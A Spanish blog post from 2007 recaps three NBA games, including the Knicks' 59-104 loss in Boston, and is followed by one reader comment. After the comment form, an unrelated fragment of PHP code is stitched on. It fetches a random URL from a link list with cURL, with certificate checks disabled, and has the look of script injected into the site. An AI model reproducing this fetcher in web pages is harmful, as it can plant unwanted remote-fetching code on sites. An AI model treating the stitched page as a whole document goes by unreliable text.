La crónica (29/11/07)

30 de November de 2007 por MagicJohnson32

En la crónica de hoy nos dedicaremos a buscar adjetivos para lo ocurrido anoche en Boston. No es tarea fácil, y los aficionados de los Knicks escucharán hoy las palabras “ridículo” y “vergüenza”, aunque lo que les gustaría ver es el despido de Isiah Thomas. En el Oeste vimos dos victorias claras en partidos que enfrentaron a equipos de Playoffs. Primero los Warriors vencieron a los Rockets de un modo que nos sorprende: desactivando a Yao y McGrady. Por último, los Lakers aprovecharon para celebrar la renovación de Phil Jackson y desarbolaron a los Nuggets en un último cuarto espectacular de… Sasha Vujacic.

Vamos con las crónicas de los tres partidos disputados anoche:

isiahcelticsKnicks 59 – 104 Celtics

No, no hemos cometido un error al poner el marcador del partido que anoche disputaron en Boston los Knicks y los Celtics. Aunque “disputar” no se ajusta a lo ocurrido sobre el parquet. Se puede hablar de “humillar”, “arrasar”, “aplastar” y muchos otros infinitivos que en realidad se quedarán cortos para definir el ridículo histórico de unos Knicks que no encuentran el fondo del pozo. Hizo falta un triple desde el centro de la pista a cargo de Nate Robinson, único knick en alcanzar los 10 puntos, para evitar la anotación más baja de la franquicia en toda su historia. Y eso que los Celtics no quisieron ensañarse: Garnett jugó menos de 23 minutos y se quedó en 8 puntos; Allen y Pierce no llegaron a los 30 minutos, en los que lograron 21 puntos cada uno. Incluso, en su último ataque, Rondo agotó el reloj de posesión y prefirió perder el balón a lanzar en una acción que pudo haber dejado la diferencia en 50 puntos y que el triple final de Robinson redujo a 45. ¿Amanecerá hoy en Manhattan con Isiah Thomas como entrenador de los Knicks?

Rockets 94 – 113 Warriors

Uno espera de los Warriors anotaciones descomunales, un juego a velocidad de vértigo, espectáculo y diversión. Lo que jamás esperábamos es que fuesen capaces de maniatar a McGrady y Yao. El equipo de Don Nelson limitó la producción de la pareja a un total de 21 puntos con 9 de 28 en tiros, 9 rebotes y 7 asistencias. Y lo hicieron al mismo tiempo que se imponían también en el aro contrario, con un ataque de nuevo liderado por Baron Davis, autor de 27 puntos, 8 asistencias, 5 rebotes y 5 robos, y secundado por Monta Ellis (18-10), Stephen Jackson (19-6-7) y Al Harrington (18-5). Fue Harrington precisamente quien se encargó de la defensa sobre Yao, algo que sólo cabe en la mente de Don Nelson pero que ofreció unos resultados más que evidentes. Mike James fue el mejor de los Rockets con 19 puntos, mientras que Scola logró 9-9 en 19 minutos de juego. Fue para los Warriors la octava victoria en nueve partidos tras un inicio de temporada con seis derrotas seguidas.

Nuggets 99 – 127 Lakers

Una franquicia tan necesitada de motivos de alegría no quiso dejar escapar la oportunidad y, pocas horas después de confirmarse la ampliación dejackkenyon contrato de Phil Jackson, regaló a su entrenador un brillante triunfo y, de pasó, regaló unos tacos a su afición (como cada vez que los Lakers ganan en casa y el rival no alcanza los 100 puntos). La victoria tuvo un protagonista inesperado, el esloveno Sasha Vujacic, que anotó 22 puntos, 19 de ellos en un último cuarto demoledor (24-46). Kobe Bryant, que ante la exhibición de Vujacic pudo descansar todo el último periodo, firmó 24 puntos, 6 rebotes y 7 asistencias en 30 minutos. Bynum siguió acumulando dobles-dobles, con 12 puntos y 13 rebotes, y Walton, Farmar, Odom y Fisher lograron más de diez puntos cada uno. Hubo tiempo incluso para el rookie Crittenton, que en cinco minutos logró 7 puntos, 3 rebotes y 1 asistencia. Para los Nuggets, Iverson y Melo cumplieron con 21 y 23 puntos, pero los de George Karl (que aprovechó la visita para ver a su hijo lograr 19 puntos en la victoria de los L.A.D-Fenders) no pudieron frenar el ataque de los Lakers pese a un primer cuarto de dominio visitante (33-21).

Comenta

Un comentario a esta entrada

  1. Dantley dice:
    #1

    Hacer menos de 60 puntos en la NBA debería ser causa de despido inmediato. Era ya la gota que ha terminado de colmar el vaso. Ese equipo necesita un cambio de 180º. Ahora mismo es una vergüenza para Nueva York tener un equipo así. Que le den el cambio o que se lo lleven a Atlantic City

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>